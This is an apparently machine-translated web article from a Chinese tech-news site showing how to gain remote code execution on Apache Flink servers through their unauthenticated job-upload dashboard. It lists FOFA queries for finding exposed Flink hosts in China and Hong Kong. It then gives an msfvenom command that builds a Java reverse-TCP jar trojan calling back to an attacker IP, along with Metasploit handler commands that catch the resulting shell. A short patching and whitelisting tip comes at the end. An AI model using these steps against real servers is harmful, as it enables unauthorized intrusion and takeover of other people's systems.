Add to Favorites | Login | Register
Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

About us Contact us

Example Analysis of Apache Flink unauthorized access + remote Code execution

2025-04-13 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Internet Technology >

Share

Shulou(Shulou.com)06/01 Report--

This article is to share with you the content of a sample analysis of Apache Flink unauthorized access + remote code execution. The editor thinks it is very practical, so share it with you as a reference and follow the editor to have a look.

Apache Flink unauthorized access + remote code executes FOFAFOFA statements

App= "Apache-Flink" & & country= "CN"

App= "Apache-Flink" & & country= "CN" & & region= "HK"

There are still a lot of Apache Flink users in China, and there are about 1K + vulnerabilities.

1. Set up a random station here and open it to reproduce it, and it will look like this after opening it.

Click Submit New Job translation: file upload 2, open MSF to generate a jar Trojan horse

Msfvenom-p java/meterpreter/reverse_tcp LHOST=**.***.59.61 LPORT=4444-f jar > testone.jar

3. Click Add to upload the jar file

4. Set the listening port

Msf5 > use exploit/multi/handler

[*] Using configured payload generic/shell_reverse_tcp

Msf5 exploit (multi/handler) > set payload java/shell/reverse_tcp

Payload = > java/shell/reverse_tcp

Msf5 exploit (multi/handler) > set lhost XX.XXX.XX.61

Lhost = > XX.XXX.XX.61

Msf5 exploit (multi/handler) > set lport 4444

Lport = > 4444

Msf5 exploit (multi/handler) > run

5. Click submit.

6. Rebound shell successfully

Repair suggestion

Users are advised to follow Apache Flink's official website and get the latest patches for this vulnerability in time. Temporary resolution it is recommended to set the IP whitelist to allow only trusted IP access to the console and add access authentication.

Thank you for reading! On "Apache Flink unauthorized access + remote code execution example analysis" this article is shared here, I hope the above content can be of some help to you, so that you can learn more knowledge, if you think the article is good, you can share it out for more people to see it!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Tag Search: Code suggestions examples analysis content files more vulnerabilities articles good practical successful list console quantity articles Trojans appearance users see vpn macOS Linux MariaDB MySQL Docker Shulou Information Shulou Technology Shulou Tech Info OPPO Reno Redmi Xiaomi NVidia Microsoft Huawei Apple Docker Apple Shulou Information Shulou Tech Info Xiaomi MariaDB MySQL vpn macOS Microsoft Redmi Shulou Technology NVidia Huawei OPPO Reno Linux Docker Apple Shulou Information Shulou Tech Info Xiaomi MariaDB MySQL vpn macOS Microsoft Redmi Shulou Technology NVidia Huawei OPPO Reno Linux

Share To

Related

Internet Technology

More Internet Technology >

Latest Network Security More Network Security >

Latest Internet Technology More Internet Technology >

Latest Development More Development >

Latest Database More Database >

Latest Servers More Servers >

Latest Mobile Phone More Mobile Phone >

Latest Android Software More Android Software >

Latest Apple Software More Apple Software >

Latest Computer Software News More Computer Software News >

Latest IT Information More IT Information >

Wechat

About us Contact us Product review car news thenatureplanet

© 2024 shulou.com SLNews company. All rights reserved.

12
Report